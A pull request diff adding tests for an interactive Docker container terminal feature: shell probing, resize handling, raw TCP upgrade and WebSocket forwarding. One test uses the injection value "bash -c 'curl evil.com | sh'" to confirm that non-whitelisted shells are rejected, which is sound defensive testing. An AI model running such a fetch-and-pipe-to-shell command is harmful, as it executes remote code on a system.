### PR TITLE
feat: add interactive terminal access for Docker containers

### DIFF
--- a/agent/src/__tests__/exec.test.ts
+++ b/agent/src/__tests__/exec.test.ts
@@ -76,10 +76,17 @@ describe('probeShell', () => {
     expect(shell).toBe('');
   });
 
-  test('returns explicit shell without probing', async () => {
+  test('returns explicit shell without probing for whitelisted names', async () => {
     const container = makeMockContainer();
     const shell = await probeShell(container as any, 'zsh');
     expect(shell).toBe('zsh');
+    expect(container.exec).not.toHaveBeenCalled();
+  });
+
+  test('rejects non-whitelisted explicit shell to prevent command injection', async () => {
+    const container = makeMockContainer();
+    const shell = await probeShell(container as any, "bash -c 'curl evil.com | sh'");
+    expect(shell).toBe('');
     expect(container.exec).not.toHaveBeenCalled();
   });
 });
@@ -168,6 +175,29 @@ describe('handleExecMessage', () => {
 
     expect(mockStream.write).toHaveBeenCalledWith('not-json');
     expect(mockExec.resize).not.toHaveBeenCalled();
+  });
+
+  test('resize failure does not fall through to stream.write', async () => {
+    const mockStream = { write: mock(() => {}) };
+    const mockExec = { resize: mock(async () => { throw new Error('docker down'); }) };
+    const resizeMsg = JSON.stringify({ type: 'resize', cols: 120, rows: 40 });
+
+    await handleExecMessage(resizeMsg, mockStream as any, mockExec as any);
+
+    expect(mockExec.resize).toHaveBeenCalled();
+    // Critical: the raw JSON must NOT be typed into the shell when resize fails.
+    expect(mockStream.write).not.toHaveBeenCalled();
+  });
+
+  test('resize with non-finite cols/rows is ignored', async () => {
+    const mockStream = { write: mock(() => {}) };
+    const mockExec = { resize: mock(async () => {}) };
+    const badMsg = JSON.stringify({ type: 'resize', cols: 'abc', rows: null });
+
+    await handleExecMessage(badMsg, mockStream as any, mockExec as any);
+
+    expect(mockExec.resize).not.toHaveBeenCalled();
+    expect(mockStream.write).not.toHaveBeenCalled();
   });
 });
 

--- a/agent/src/__tests__/exec.test.ts
+++ b/agent/src/__tests__/exec.test.ts
@@ -1,4 +1,4 @@
-import { describe, expect, test, mock, beforeAll } from 'bun:test';
+import { describe, expect, test, mock, beforeAll, beforeEach, afterEach, spyOn } from 'bun:test';
 import { EventEmitter } from 'node:events';
 import { Readable } from 'node:stream';
 import net from 'node:net';
@@ -88,6 +88,85 @@ describe('probeShell', () => {
     const shell = await probeShell(container as any, "bash -c 'curl evil.com | sh'");
     expect(shell).toBe('');
     expect(container.exec).not.toHaveBeenCalled();
+  });
+
+  describe('Detach+inspect polling loop', () => {
+    // The poll loop (exec.ts lines ~140-143) only runs when inspect()'s first
+    // response is ExitCode -1 (still running). The default makeMockContainer
+    // always returns the final code, so these tests build their own mocks to
+    // exercise the in-flight branch added in commit d6f375c.
+
+    let setTimeoutSpy: ReturnType<typeof spyOn>;
+    beforeEach(() => {
+      // Fire setTimeout callbacks immediately so the 50ms poll interval doesn't
+      // stretch each test out to multiple seconds.
+      setTimeoutSpy = spyOn(globalThis, 'setTimeout').mockImplementation(((cb: () => void) => {
+        cb();
+        return 0 as unknown as ReturnType<typeof setTimeout>;
+      }) as typeof setTimeout);
+    });
+    afterEach(() => { setTimeoutSpy.mockRestore(); });
+
+    test('polls inspect() until ExitCode flips from -1 to 0 and returns the shell', async () => {
+      let inspectCount = 0;
+      const container = {
+        exec: mock(async () => ({
+          start: mock(async () => {}),
+          inspect: mock(async () => {
+            inspectCount += 1;
+            // First two calls report "still running", third call reports clean exit.
+            return { ExitCode: inspectCount >= 3 ? 0 : -1 };
+          }),
+          resize: mock(async () => {}),
+        })),
+      };
+
+      const shell = await probeShell(container as any, 'auto');
+      expect(shell).toBe('bash');
+      expect(inspectCount).toBeGreaterThanOrEqual(3);
+    });
+
+    test('moves to next candidate when ExitCode stays -1 past the deadline', async () => {
+      // Date.now must advance past start+5000 within a few iterations so the
+      // while loop exits via the deadline check without a real 5-second wait.
+      const dateSpy = spyOn(Date, 'now');
+      // deadline = first call + 5000. Subsequent calls jump fast.
+      dateSpy
+        .mockReturnValueOnce(1_000_000)        // deadline = 1_005_000
+        .mockReturnValueOnce(1_000_100)        // loop iter 1: still under deadline
+        .mockReturnValueOnce(1_006_000)        // loop iter 2: past deadline -> exit
+        // bash candidate also calls Date.now during its loop on the next shell
+        // attempt; sh's loop reuses fresh deadline math. Provide enough values
+        // for sh and ash to also exit via deadline.
+        .mockReturnValueOnce(2_000_000)
+        .mockReturnValueOnce(2_006_000)
+        .mockReturnValueOnce(3_000_000)
+        .mockReturnValueOnce(3_006_000)
+        .mockReturnValue(9_999_999);            // any further calls -> deadline expired
+
+      let bashAttempts = 0;
+      const container = {
+        exec: mock(async (opts: { Cmd: string[] }) => {
+          if (opts.Cmd[0] === 'bash') bashAttempts += 1;
+          return {
+            start: mock(async () => {}),
+            // Always still running; polling loop exits via deadline.
+            inspect: mock(async () => ({ ExitCode: -1 })),
+            resize: mock(async () => {}),
+          };
+        }),
+      };
+
+      try {
+        const shell = await probeShell(container as any, 'auto');
+        // None of bash/sh/ash ever reach ExitCode 0, so probeShell yields ''.
+        expect(shell).toBe('');
+        // bash WAS attempted (poll ran), but did NOT return as the resolved shell.
+        expect(bashAttempts).toBe(1);
+      } finally {
+        dateSpy.mockRestore();
+      }
+    });
   });
 });
 
@@ -316,5 +395,75 @@ describe('handleExecSocket', () => {
     await new Promise((r) => setTimeout(r, 20));
 
     expect(mockWs.close).toHaveBeenCalledWith(1011, 'Exec stream error');
+  });
+
+  test('forwards stream chunks even while exec.resize is still pending', async () => {
+    // Pins the ordering established in commit 226131a: exec.resize is launched
+    // as fire-and-forget AFTER ws.data.execStream is set and the async-iter
+    // consumer is started. A regression that put `await exec.resize(...)` ahead
+    // of the consumer would block ws.send until resize resolved.
+    const { stream: execStream, push } = makeControllableStream();
+    // Held captive for the test lifetime: resize never resolves on purpose so
+    // any code that awaits it would deadlock and ws.send would never fire.
+    const resizePromise = new Promise<void>(() => { /* never resolves */ });
+    const createdExecInstances: Array<{ resize: ReturnType<typeof mock> }> = [];
+
+    const ttyContainer = {
+      exec: mock(async (opts: { Tty?: boolean }) => {
+        const inst = {
+          id: opts.Tty ? 'exec-id-pending-resize' : undefined,
+          start: mock(async () => {}),
+          inspect: mock(async () => ({ ExitCode: 0 })),
+          resize: mock(() => resizePromise),
+        };
+        createdExecInstances.push(inst);
+        return inst;
+      }),
+    };
+    const mockDocker = { getContainer: mock(() => ttyContainer) };
+    const mockWs = { send: mock(() => {}), close: mock(() => {}), data: { shell: 'bash', cols: 120, rows: 40 } };
+    const startStream = mock(async () => ({
+      socket: execStream as unknown as import('node:net').Socket,
+      initialBytes: Buffer.alloc(0),
+    }));
+
+    await handleExecSocket(mockDocker as any, 'docker', 2375, 'abc123', mockWs as any, startStream);
+
+    push(Buffer.from('output-after-resize-deferred'));
+    await new Promise((r) => setTimeout(r, 20));
+
+    expect(mockWs.send).toHaveBeenCalledWith(Buffer.from('output-after-resize-deferred'));
+    // Sanity: resize WAS dispatched on the TTY exec instance the handler
+    // created (so the call shape under test is the real fire-and-forget path).
+    const ttyInst = createdExecInstances.at(-1);
+    expect(ttyInst?.resize).toHaveBeenCalled();
+  });
+
+  test('exec.resize rejection is swallowed and does not close the session', async () => {
+    const { stream: execStream, push } = makeControllableStream();
+    const ttyContainer = {
+      exec: mock(async (opts: { Tty?: boolean }) => ({
+        id: opts.Tty ? 'exec-id-resize-rejects' : undefined,
+        start: mock(async () => {}),
+        inspect: mock(async () => ({ ExitCode: 0 })),
+        resize: mock(async () => { throw new Error('docker resize failed'); }),
+      })),
+    };
+    const mockDocker = { getContainer: mock(() => ttyContainer) };
+    const mockWs = { send: mock(() => {}), close: mock(() => {}), data: { shell: 'bash', cols: 80, rows: 24 } };
+    const startStream = mock(async () => ({
+      socket: execStream as unknown as import('node:net').Socket,
+      initialBytes: Buffer.alloc(0),
+    }));
+
+    await handleExecSocket(mockDocker as any, 'docker', 2375, 'abc123', mockWs as any, startStream);
+
+    push(Buffer.from('still-flowing'));
+    // Allow the rejected resize promise's .catch handler to settle.
+    await new Promise((r) => setTimeout(r, 20));
+
+    expect(mockWs.send).toHaveBeenCalledWith(Buffer.from('still-flowing'));
+    // The session must NOT have been closed by the resize rejection.
+    expect(mockWs.close).not.toHaveBeenCalled();
   });
 });

--- a/agent/src/__tests__/exec.test.ts
+++ b/agent/src/__tests__/exec.test.ts
@@ -1,7 +1,7 @@
 import { describe, expect, test, mock, beforeAll, beforeEach, afterEach, spyOn } from 'bun:test';
 import { EventEmitter } from 'node:events';
 import { Readable } from 'node:stream';
-import net from 'node:net';
+import type net from 'node:net';
 
 /** Readable stream whose data/end/error can be driven from outside. */
 function makeControllableStream() {
@@ -90,6 +90,21 @@ describe('probeShell', () => {
     expect(container.exec).not.toHaveBeenCalled();
   });
 
+  test('falls back to sh when container.exec throws for bash', async () => {
+    const container = {
+      exec: mock(async (opts: { Cmd: string[] }) => {
+        if (opts.Cmd[0] === 'bash') throw new Error('exec create failed');
+        return {
+          start: mock(async () => {}),
+          inspect: mock(async () => ({ ExitCode: 0 })),
+          resize: mock(async () => {}),
+        };
+      }),
+    };
+    const shell = await probeShell(container as any, 'auto');
+    expect(shell).toBe('sh');
+  });
+
   describe('Detach+inspect polling loop', () => {
     // The poll loop (exec.ts lines ~140-143) only runs when inspect()'s first
     // response is ExitCode -1 (still running). The default makeMockContainer
@@ -171,55 +186,116 @@ describe('probeShell', () => {
 });
 
 describe('startExecRawTcp', () => {
-  /** Spin up a fake TCP "Docker" server that responds to /exec/{id}/start with a 101 upgrade. */
-  async function withFakeDocker<T>(
-    behavior: (sock: net.Socket) => void,
-    run: (host: string, port: number) => Promise<T>,
-  ): Promise<T> {
-    const server = net.createServer((sock) => behavior(sock));
-    await new Promise<void>((resolve) => server.listen(0, '127.0.0.1', resolve));
-    const { port } = server.address() as net.AddressInfo;
-    try {
-      return await run('127.0.0.1', port);
-    } finally {
-      await new Promise<void>((resolve) => server.close(() => resolve()));
-    }
+  // connectFn injection avoids real TCP connections — fake socket driven by events.
+  function makeFakeSocket() {
+    const sock = new EventEmitter() as EventEmitter & {
+      write: ReturnType<typeof mock>;
+      destroy: ReturnType<typeof mock>;
+      destroyed: boolean;
+    };
+    sock.destroyed = false;
+    sock.write = mock(() => true);
+    sock.destroy = mock(() => {
+      if (!sock.destroyed) {
+        sock.destroyed = true;
+        sock.emit('close');
+      }
+    });
+    return sock;
   }
 
   test('resolves with socket and trailing bytes after a 101 upgrade', async () => {
-    const result = await withFakeDocker(
-      (sock) => {
-        sock.once('data', () => {
-          sock.write(
-            'HTTP/1.1 101 UPGRADED\r\n' +
-            'Content-Type: application/vnd.docker.raw-stream\r\n' +
-            'Connection: Upgrade\r\n' +
-            'Upgrade: tcp\r\n' +
-            '\r\n' +
-            'hello-payload'
-          );
-        });
-      },
-      async (host, port) => {
-        const { socket, initialBytes } = await startExecRawTcp(host, port, 'execid');
-        socket.destroy();
-        return initialBytes.toString();
-      },
-    );
-    expect(result).toBe('hello-payload');
+    const fakeSocket = makeFakeSocket();
+    const connectFn = mock(() => fakeSocket as unknown as net.Socket);
+
+    const promise = startExecRawTcp('localhost', 2375, 'execid', connectFn);
+
+    fakeSocket.emit('connect');
+    fakeSocket.emit('data', Buffer.from(
+      'HTTP/1.1 101 UPGRADED\r\n' +
+      'Content-Type: application/vnd.docker.raw-stream\r\n' +
+      '\r\n' +
+      'hello-payload',
+    ));
+
+    const { socket, initialBytes } = await promise;
+    socket.destroy();
+    expect(initialBytes.toString()).toBe('hello-payload');
   });
 
   test('rejects on non-101 response', async () => {
-    await expect(
-      withFakeDocker(
-        (sock) => {
-          sock.once('data', () => {
-            sock.write('HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n');
-          });
-        },
-        (host, port) => startExecRawTcp(host, port, 'execid'),
-      ),
-    ).rejects.toThrow(/404/);
+    const fakeSocket = makeFakeSocket();
+    const connectFn = mock(() => fakeSocket as unknown as net.Socket);
+
+    const promise = startExecRawTcp('localhost', 2375, 'execid', connectFn);
+
+    fakeSocket.emit('connect');
+    fakeSocket.emit('data', Buffer.from('HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n'));
+
+    await expect(promise).rejects.toThrow(/404/);
+  });
+
+  test('rejects when server closes connection before sending 101', async () => {
+    const fakeSocket = makeFakeSocket();
+    const connectFn = mock(() => fakeSocket as unknown as net.Socket);
+
+    const promise = startExecRawTcp('localhost', 2375, 'execid', connectFn);
+
+    fakeSocket.emit('connect');
+    fakeSocket.emit('close');
+
+    await expect(promise).rejects.toThrow(/closed before HTTP upgrade/);
+  });
+
+  test('rejects when server sends EOF before 101', async () => {
+    const fakeSocket = makeFakeSocket();
+    const connectFn = mock(() => fakeSocket as unknown as net.Socket);
+
+    const promise = startExecRawTcp('localhost', 2375, 'execid', connectFn);
+
+    fakeSocket.emit('connect');
+    fakeSocket.emit('end');
+
+    await expect(promise).rejects.toThrow(/closed connection before sending 101/);
+    expect(fakeSocket.destroy).toHaveBeenCalled();
+  });
+
+  test('rejects on socket error', async () => {
+    const fakeSocket = makeFakeSocket();
+    const connectFn = mock(() => fakeSocket as unknown as net.Socket);
+
+    const promise = startExecRawTcp('localhost', 2375, 'execid', connectFn);
+
+    fakeSocket.emit('error', new Error('ECONNREFUSED'));
+
+    await expect(promise).rejects.toThrow(/ECONNREFUSED/);
+  });
+
+  describe('timeout', () => {
+    let capturedCb: (() => void) | null;
+    let setTimeoutSpy: ReturnType<typeof spyOn>;
+
+    beforeEach(() => {
+      capturedCb = null;
+      setTimeoutSpy = spyOn(globalThis, 'setTimeout').mockImplementation(((cb: () => void) => {
+        capturedCb = cb;
+        return 0 as unknown as ReturnType<typeof setTimeout>;
+      }) as typeof setTimeout);
+    });
+    afterEach(() => { setTimeoutSpy.mockRestore(); });
+
+    test('rejects and destroys socket when upgrade takes too long', async () => {
+      const fakeSocket = makeFakeSocket();
+      const connectFn = mock(() => fakeSocket as unknown as net.Socket);
+
+      const promise = startExecRawTcp('localhost', 2375, 'execid', connectFn);
+
+      fakeSocket.emit('connect');
+      capturedCb?.();
+
+      await expect(promise).rejects.toThrow(/Timeout/);
+      expect(fakeSocket.destroy).toHaveBeenCalled();
+    });
   });
 });
 
@@ -465,5 +541,44 @@ describe('handleExecSocket', () => {
     expect(mockWs.send).toHaveBeenCalledWith(Buffer.from('still-flowing'));
     // The session must NOT have been closed by the resize rejection.
     expect(mockWs.close).not.toHaveBeenCalled();
+  });
+
+  test('closes ws with 1011 when startStream rejects', async () => {
+    const mockContainer = makeTtyContainer();
+    const mockDocker = { getContainer: mock(() => mockContainer) };
+    const mockWs = { send: mock(() => {}), close: mock(() => {}), data: { shell: 'bash', cols: 80, rows: 24 } };
+    const failingStartStream = mock(async () => { throw new Error('connection refused'); });
+
+    await handleExecSocket(mockDocker as any, 'docker', 2375, 'container1', mockWs as any, failingStartStream);
+
+    expect(mockWs.close).toHaveBeenCalledWith(1011, 'Failed to start exec session');
+  });
+
+  test('destroys exec socket and returns early when ws.send throws on shell announcement', async () => {
+    const { stream: execStream } = makeControllableStream();
+    const destroySpy = spyOn(execStream, 'destroy');
+    const mockContainer = makeTtyContainer();
+    const mockDocker = { getContainer: mock(() => mockContainer) };
+    let sendCallCount = 0;
+    const mockWs = {
+      send: mock((..._args: unknown[]) => {
+        sendCallCount += 1;
+        // Throw only on the first call (the shell announcement JSON).
+        if (sendCallCount === 1) throw new Error('WebSocket already closed');
+      }),
+      close: mock(() => {}),
+      data: { shell: 'bash', cols: 80, rows: 24 },
+    };
+    const startStream = mock(async () => ({
+      socket: execStream as unknown as import('node:net').Socket,
+      initialBytes: Buffer.alloc(0),
+    }));
+
+    await handleExecSocket(mockDocker as any, 'docker', 2375, 'abc123', mockWs as any, startStream);
+
+    // Socket must be torn down so the Docker connection doesn't leak.
+    expect(destroySpy).toHaveBeenCalled();
+    // Function returns early; no 1011 close on this path.
+    expect(mockWs.close).not.toHaveBeenCalledWith(1011, 'Failed to start exec session');
   });
 });

--- a/agent/src/__tests__/exec.test.ts
+++ b/agent/src/__tests__/exec.test.ts
@@ -1,0 +1,155 @@
+import { describe, expect, test, mock, beforeAll } from 'bun:test';
+import { EventEmitter } from 'node:events';
+
+beforeAll(() => {
+  console.error = mock(() => {});
+});
+
+/** Build a mock Dockerode container with controllable exec behavior. */
+function makeMockContainer(opts: {
+  probeExitCode?: Record<string, number>;
+} = {}) {
+  const probeExitCode = opts.probeExitCode ?? {};
+  const mockExecInstances: Array<{ start: ReturnType<typeof mock>; resize: ReturnType<typeof mock>; inspect: ReturnType<typeof mock> }> = [];
+
+  const container = {
+    exec: mock(async (options: { Cmd: string[] }) => {
+      const cmd = options.Cmd[0];
+      const exitCode = probeExitCode[cmd] ?? 0;
+      const emitter = new EventEmitter();
+      const execInstance = {
+        start: mock(async () => {
+          // Always emit 'end' so probeShell's end-event await resolves.
+          // The socket test's execEmitter is a separate instance that the
+          // caller controls independently, so this doesn't affect it.
+          setTimeout(() => emitter.emit('end'), 5);
+          return emitter;
+        }),
+        resize: mock(async () => {}),
+        inspect: mock(async () => ({ ExitCode: exitCode })),
+      };
+      mockExecInstances.push(execInstance);
+      return execInstance;
+    }),
+    execInstances: mockExecInstances,
+  };
+
+  return container;
+}
+
+const { probeShell, handleExecSocket, handleExecMessage } = await import('../routes/exec');
+
+describe('probeShell', () => {
+  test('returns bash when bash exits 0', async () => {
+    const container = makeMockContainer({ probeExitCode: { bash: 0 } });
+    const shell = await probeShell(container as any, 'auto');
+    expect(shell).toBe('bash');
+  });
+
+  test('falls back to sh when bash exits non-zero', async () => {
+    const container = makeMockContainer({ probeExitCode: { bash: 1, sh: 0 } });
+    const shell = await probeShell(container as any, 'auto');
+    expect(shell).toBe('sh');
+  });
+
+  test('falls back to ash when bash and sh unavailable', async () => {
+    const container = makeMockContainer({ probeExitCode: { bash: 127, sh: 127, ash: 0 } });
+    const shell = await probeShell(container as any, 'auto');
+    expect(shell).toBe('ash');
+  });
+
+  test('returns empty string when no shell found', async () => {
+    const container = makeMockContainer({ probeExitCode: { bash: 127, sh: 127, ash: 127 } });
+    const shell = await probeShell(container as any, 'auto');
+    expect(shell).toBe('');
+  });
+
+  test('returns explicit shell without probing', async () => {
+    const container = makeMockContainer();
+    const shell = await probeShell(container as any, 'zsh');
+    expect(shell).toBe('zsh');
+    expect(container.exec).not.toHaveBeenCalled();
+  });
+});
+
+describe('handleExecMessage', () => {
+  test('resize message triggers exec.resize', async () => {
+    const mockStream = { write: mock(() => {}) };
+    const mockExec = { resize: mock(async () => {}) };
+    const resizeMsg = JSON.stringify({ type: 'resize', cols: 120, rows: 40 });
+
+    await handleExecMessage(resizeMsg, mockStream as any, mockExec as any);
+
+    expect(mockExec.resize).toHaveBeenCalledWith({ h: 40, w: 120 });
+    expect(mockStream.write).not.toHaveBeenCalled();
+  });
+
+  test('binary stdin message writes to exec stream', async () => {
+    const mockStream = { write: mock(() => {}) };
+    const mockExec = { resize: mock(async () => {}) };
+    const stdinData = Buffer.from('ls -la\r');
+
+    await handleExecMessage(stdinData, mockStream as any, mockExec as any);
+
+    expect(mockStream.write).toHaveBeenCalledWith(stdinData);
+    expect(mockExec.resize).not.toHaveBeenCalled();
+  });
+
+  test('string stdin (non-resize JSON) writes to exec stream', async () => {
+    const mockStream = { write: mock(() => {}) };
+    const mockExec = { resize: mock(async () => {}) };
+
+    await handleExecMessage('not-json', mockStream as any, mockExec as any);
+
+    expect(mockStream.write).toHaveBeenCalledWith('not-json');
+    expect(mockExec.resize).not.toHaveBeenCalled();
+  });
+});
+
+describe('handleExecSocket', () => {
+  test('closes with 1011 when no shell found', async () => {
+    const container = makeMockContainer({ probeExitCode: { bash: 127, sh: 127, ash: 127 } });
+    const mockDocker = { getContainer: mock(() => container) };
+    const mockWs = { send: mock(() => {}), close: mock(() => {}), data: { shell: 'auto', cols: 80, rows: 24 } };
+
+    await handleExecSocket(mockDocker as any, 'abc123', mockWs as any);
+
+    expect(mockWs.close).toHaveBeenCalledWith(1011, 'No supported shell found in container');
+  });
+
+  test('sends exec output to WebSocket', async () => {
+    const execEmitter = new EventEmitter();
+    let probeCallCount = 0;
+
+    const mockContainer = {
+      exec: mock(async (opts: { Cmd: string[]; Tty?: boolean }) => {
+        if (!opts.Tty) {
+          // Probe call
+          probeCallCount++;
+          const probe = new EventEmitter();
+          return {
+            start: mock(async () => { setTimeout(() => probe.emit('end'), 5); return probe; }),
+            inspect: mock(async () => ({ ExitCode: 0 })),
+            resize: mock(async () => {}),
+          };
+        }
+        // Actual exec
+        return {
+          start: mock(async () => execEmitter),
+          inspect: mock(async () => ({ ExitCode: 0 })),
+          resize: mock(async () => {}),
+        };
+      }),
+    };
+
+    const mockDocker = { getContainer: mock(() => mockContainer) };
+    const mockWs = { send: mock(() => {}), close: mock(() => {}), data: { shell: 'bash', cols: 80, rows: 24 } };
+
+    await handleExecSocket(mockDocker as any, 'abc123', mockWs as any);
+
+    execEmitter.emit('data', Buffer.from('hello'));
+    await new Promise((r) => setTimeout(r, 10));
+
+    expect(mockWs.send).toHaveBeenCalledWith(Buffer.from('hello'));
+  });
+});

--- a/agent/src/__tests__/exec.test.ts
+++ b/agent/src/__tests__/exec.test.ts
@@ -1,6 +1,7 @@
 import { describe, expect, test, mock, beforeAll } from 'bun:test';
 import { EventEmitter } from 'node:events';
 import { Readable } from 'node:stream';
+import net from 'node:net';
 
 /** Readable stream whose data/end/error can be driven from outside. */
 function makeControllableStream() {
@@ -48,7 +49,7 @@ function makeMockContainer(opts: {
   return container;
 }
 
-const { probeShell, handleExecSocket, handleExecMessage } = await import('../routes/exec');
+const { probeShell, handleExecSocket, handleExecMessage, startExecRawTcp } = await import('../routes/exec');
 
 describe('probeShell', () => {
   test('returns bash when bash exits 0', async () => {
@@ -80,6 +81,59 @@ describe('probeShell', () => {
     const shell = await probeShell(container as any, 'zsh');
     expect(shell).toBe('zsh');
     expect(container.exec).not.toHaveBeenCalled();
+  });
+});
+
+describe('startExecRawTcp', () => {
+  /** Spin up a fake TCP "Docker" server that responds to /exec/{id}/start with a 101 upgrade. */
+  async function withFakeDocker<T>(
+    behavior: (sock: net.Socket) => void,
+    run: (host: string, port: number) => Promise<T>,
+  ): Promise<T> {
+    const server = net.createServer((sock) => behavior(sock));
+    await new Promise<void>((resolve) => server.listen(0, '127.0.0.1', resolve));
+    const { port } = server.address() as net.AddressInfo;
+    try {
+      return await run('127.0.0.1', port);
+    } finally {
+      await new Promise<void>((resolve) => server.close(() => resolve()));
+    }
+  }
+
+  test('resolves with socket and trailing bytes after a 101 upgrade', async () => {
+    const result = await withFakeDocker(
+      (sock) => {
+        sock.once('data', () => {
+          sock.write(
+            'HTTP/1.1 101 UPGRADED\r\n' +
+            'Content-Type: application/vnd.docker.raw-stream\r\n' +
+            'Connection: Upgrade\r\n' +
+            'Upgrade: tcp\r\n' +
+            '\r\n' +
+            'hello-payload'
+          );
+        });
+      },
+      async (host, port) => {
+        const { socket, initialBytes } = await startExecRawTcp(host, port, 'execid');
+        socket.destroy();
+        return initialBytes.toString();
+      },
+    );
+    expect(result).toBe('hello-payload');
+  });
+
+  test('rejects on non-101 response', async () => {
+    await expect(
+      withFakeDocker(
+        (sock) => {
+          sock.once('data', () => {
+            sock.write('HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n');
+          });
+        },
+        (host, port) => startExecRawTcp(host, port, 'execid'),
+      ),
+    ).rejects.toThrow(/404/);
   });
 });
 
@@ -123,15 +177,14 @@ describe('handleExecSocket', () => {
     const mockDocker = { getContainer: mock(() => container) };
     const mockWs = { send: mock(() => {}), close: mock(() => {}), data: { shell: 'auto', cols: 80, rows: 24 } };
 
-    await handleExecSocket(mockDocker as any, 'abc123', mockWs as any);
+    await handleExecSocket(mockDocker as any, 'docker', 2375, 'abc123', mockWs as any);
 
     expect(mockWs.close).toHaveBeenCalledWith(1011, 'No supported shell found in container');
   });
 
-  test('sends exec output to WebSocket', async () => {
-    const { stream: execStream, push } = makeControllableStream();
-
-    const mockContainer = {
+  /** Build a TTY-mode container whose exec returns the supplied stream from startStream. */
+  function makeTtyContainer() {
+    return {
       exec: mock(async (opts: { Cmd: string[]; Tty?: boolean }) => {
         if (!opts.Tty) {
           return {
@@ -141,47 +194,75 @@ describe('handleExecSocket', () => {
           };
         }
         return {
-          start: mock(async () => execStream),
+          id: 'exec-id-xyz',
+          start: mock(async () => { throw new Error('start should not be called'); }),
           inspect: mock(async () => ({ ExitCode: 0 })),
           resize: mock(async () => {}),
         };
       }),
     };
+  }
 
+  test('sends exec output to WebSocket', async () => {
+    const { stream: execStream, push } = makeControllableStream();
+    const mockContainer = makeTtyContainer();
     const mockDocker = { getContainer: mock(() => mockContainer) };
     const mockWs = { send: mock(() => {}), close: mock(() => {}), data: { shell: 'bash', cols: 80, rows: 24 } };
+    const startStream = mock(async () => ({
+      socket: execStream as unknown as import('node:net').Socket,
+      initialBytes: Buffer.alloc(0),
+    }));
 
-    await handleExecSocket(mockDocker as any, 'abc123', mockWs as any);
+    await handleExecSocket(mockDocker as any, 'docker', 2375, 'abc123', mockWs as any, startStream);
 
     push(Buffer.from('hello'));
     await new Promise((r) => setTimeout(r, 20));
 
+    expect(startStream).toHaveBeenCalledWith('docker', 2375, 'exec-id-xyz');
     expect(mockWs.send).toHaveBeenCalledWith(Buffer.from('hello'));
+  });
+
+  test('sends resolved shell as JSON control frame before any output', async () => {
+    const { stream: execStream } = makeControllableStream();
+    const mockContainer = makeTtyContainer();
+    const mockDocker = { getContainer: mock(() => mockContainer) };
+    const mockWs = { send: mock(() => {}), close: mock(() => {}), data: { shell: 'bash', cols: 80, rows: 24 } };
+    const startStream = mock(async () => ({
+      socket: execStream as unknown as import('node:net').Socket,
+      initialBytes: Buffer.alloc(0),
+    }));
+
+    await handleExecSocket(mockDocker as any, 'docker', 2375, 'abc123', mockWs as any, startStream);
+
+    expect(mockWs.send).toHaveBeenCalledWith(JSON.stringify({ type: 'shell', name: 'bash' }));
+  });
+
+  test('forwards initialBytes from the upgrade as the first binary frame', async () => {
+    const { stream: execStream } = makeControllableStream();
+    const mockContainer = makeTtyContainer();
+    const mockDocker = { getContainer: mock(() => mockContainer) };
+    const mockWs = { send: mock(() => {}), close: mock(() => {}), data: { shell: 'bash', cols: 80, rows: 24 } };
+    const startStream = mock(async () => ({
+      socket: execStream as unknown as import('node:net').Socket,
+      initialBytes: Buffer.from('prompt$ '),
+    }));
+
+    await handleExecSocket(mockDocker as any, 'docker', 2375, 'abc123', mockWs as any, startStream);
+
+    expect(mockWs.send).toHaveBeenCalledWith(Buffer.from('prompt$ '));
   });
 
   test('closes WebSocket with 1000 when exec stream ends', async () => {
     const { stream: execStream, push } = makeControllableStream();
-
-    const mockContainer = {
-      exec: mock(async (opts: { Cmd: string[]; Tty?: boolean }) => {
-        if (!opts.Tty) {
-          return {
-            start: mock(async () => {}),
-            inspect: mock(async () => ({ ExitCode: 0 })),
-            resize: mock(async () => {}),
-          };
-        }
-        return {
-          start: mock(async () => execStream),
-          inspect: mock(async () => ({ ExitCode: 0 })),
-          resize: mock(async () => {}),
-        };
-      }),
-    };
+    const mockContainer = makeTtyContainer();
     const mockDocker = { getContainer: mock(() => mockContainer) };
     const mockWs = { send: mock(() => {}), close: mock(() => {}), data: { shell: 'bash', cols: 80, rows: 24 } };
+    const startStream = mock(async () => ({
+      socket: execStream as unknown as import('node:net').Socket,
+      initialBytes: Buffer.alloc(0),
+    }));
 
-    await handleExecSocket(mockDocker as any, 'abc123', mockWs as any);
+    await handleExecSocket(mockDocker as any, 'docker', 2375, 'abc123', mockWs as any, startStream);
 
     push(null); // end the stream
     await new Promise((r) => setTimeout(r, 20));
@@ -191,27 +272,15 @@ describe('handleExecSocket', () => {
 
   test('closes WebSocket with 1011 when exec stream errors', async () => {
     const { stream: execStream, error: errorStream } = makeControllableStream();
-
-    const mockContainer = {
-      exec: mock(async (opts: { Cmd: string[]; Tty?: boolean }) => {
-        if (!opts.Tty) {
-          return {
-            start: mock(async () => {}),
-            inspect: mock(async () => ({ ExitCode: 0 })),
-            resize: mock(async () => {}),
-          };
-        }
-        return {
-          start: mock(async () => execStream),
-          inspect: mock(async () => ({ ExitCode: 0 })),
-          resize: mock(async () => {}),
-        };
-      }),
-    };
+    const mockContainer = makeTtyContainer();
     const mockDocker = { getContainer: mock(() => mockContainer) };
     const mockWs = { send: mock(() => {}), close: mock(() => {}), data: { shell: 'bash', cols: 80, rows: 24 } };
+    const startStream = mock(async () => ({
+      socket: execStream as unknown as import('node:net').Socket,
+      initialBytes: Buffer.alloc(0),
+    }));
 
-    await handleExecSocket(mockDocker as any, 'abc123', mockWs as any);
+    await handleExecSocket(mockDocker as any, 'docker', 2375, 'abc123', mockWs as any, startStream);
 
     errorStream(new Error('pipe broken'));
     await new Promise((r) => setTimeout(r, 20));

--- a/agent/src/__tests__/exec.test.ts
+++ b/agent/src/__tests__/exec.test.ts
@@ -1,4 +1,4 @@
-import { describe, expect, test, mock, beforeAll, beforeEach, afterEach, spyOn } from 'bun:test';
+import { describe, expect, test, mock, beforeEach, afterEach, spyOn } from 'bun:test';
 import { EventEmitter } from 'node:events';
 import { Readable } from 'node:stream';
 import type net from 'node:net';
@@ -13,8 +13,12 @@ function makeControllableStream() {
   };
 }
 
-beforeAll(() => {
-  console.error = mock(() => {});
+let consoleErrorSpy: ReturnType<typeof spyOn>;
+beforeEach(() => {
+  consoleErrorSpy = spyOn(console, 'error').mockImplementation(() => {});
+});
+afterEach(() => {
+  consoleErrorSpy.mockRestore();
 });
 
 /** Build a mock Dockerode container with controllable exec behavior. */

--- a/agent/src/__tests__/exec.test.ts
+++ b/agent/src/__tests__/exec.test.ts
@@ -1,5 +1,16 @@
